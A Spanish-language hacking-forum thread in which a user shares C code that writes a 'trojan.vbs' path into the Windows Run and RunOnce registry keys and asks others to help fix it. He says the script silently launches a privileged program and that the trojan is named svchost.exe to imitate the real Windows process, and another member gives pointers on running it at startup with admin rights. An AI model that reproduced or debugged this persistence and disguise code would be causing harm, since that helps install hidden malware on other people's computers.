Microsoft visual studio 2012

Iniciado por Kaxperday, 25 Septiembre 2014, 12:29 PM

0 Miembros y 1 Visitante están viendo este tema.

kub0x

Buenas,

esto lo sufri yo hace tiempo. En que clave lo has registrado? Deberias de hacerlo en HKLM.

Saludos.
Viejos siempre viejos,
Ellos tienen el poder,
Y la juventud,
¡En el ataúd! Criaturas Al poder.

Visita mi perfil en ResearchGate


Kaxperday

Vaya me alegra que sepas a lo que me refiero xD, pues tengo esto:


int regKey,regOpen;
char *path="C:\\Windows\\directorio\\trojan.vbs";
HKEY hkey;
regOpen=RegOpenKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&hkey);
if(regOpen==1)
    {
        printf("La clave ya esta creada\n");system("pause");
    }
else
{
regKey=RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&hkey);
if(regKey==0)
{
RegSetValueEx((HKEY)hkey,"AutoRunVBS",0,REG_SZ,(BYTE*)path,strlen(path));
printf("Hemos creado la clave");
system("pause");
}
else
        {
            printf("No se pudo crear la clave en el registro\n");
            system("pause");
        }
}



No se como va eso, ¿dónde debería de meter lo de HKLM para que me funcione? O al menos intentarlo, muchas gracias por la ayuda.
Cuando el poder económico parasita al político ningún partido ni dictador podrá liberarnos de él. Se reserva el 99% ese poder.

kub0x

En este post pregunté lo mismo que tú. Básicamente, como ejecutar una aplicación en el inicio en modo admin (via manifest).

http://foro.elhacker.net/windows/win7_ejecutar_aplicacion_con_derechos_de_administrador_desde_el_registro-t360123.0.html
Viejos siempre viejos,
Ellos tienen el poder,
Y la juventud,
¡En el ataúd! Criaturas Al poder.

Visita mi perfil en ResearchGate


Kaxperday

#23
Vaya lo he estado leyendo hasta ahora, y la verdad la única diferencia que veo es que tu clave al final tiene "RunOnce" y la mia "Run", no se si será eso, pero es la primera diferencia de la que me percaté, lo pruebo y te comento.

De todas formas, es una cosa rara mi caso, ya que yo anclo al inicop un .vbs que me ejecutará en silencio el programa que tiene provilegios. Probando...

Edito: Vaya parece que no me funcionó, probé con esto:


int regKey,regOpen;
char *path="C:\\Windows\\directorio\\trojan.vbs";
HKEY hkey;
regOpen=RegOpenKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce",&hkey);
if(regOpen==1)
   {
       printf("La clave ya esta creada\n");system("pause");
   }
else
{
regKey=RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce",&hkey);
if(regKey==0)
{
RegSetValueEx((HKEY)hkey,"AutoRunVBS",0,REG_SZ,(BYTE*)path,strlen(path));
printf("Hemos creado la clave");
system("pause");
}
else
       {
           printf("No se pudo crear la clave en el registro\n");
           system("pause");
       }
}



Me dice que ha creado la clave reinició pero no se ejecuta el programa, no se que puede ser, según ví tu clave era igual que la mía entonces no entiendo por qué. Además los archivos siguen con necesitando el permiso del administrador para usarse TODOS, no solo el .exe me pregunto porqué será quizás sea porque están dentro del directorio de windows o no sé.

Destacar que el troyano se llama svchost.exe quizás influya ya que hay otro con el mismo nombre, pero no creo que sea ese el problema.

También he probado con esto:

HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run

Y me dice que no se pudo crear clave en el registro, vaya :(

Saludos
Cuando el poder económico parasita al político ningún partido ni dictador podrá liberarnos de él. Se reserva el 99% ese poder.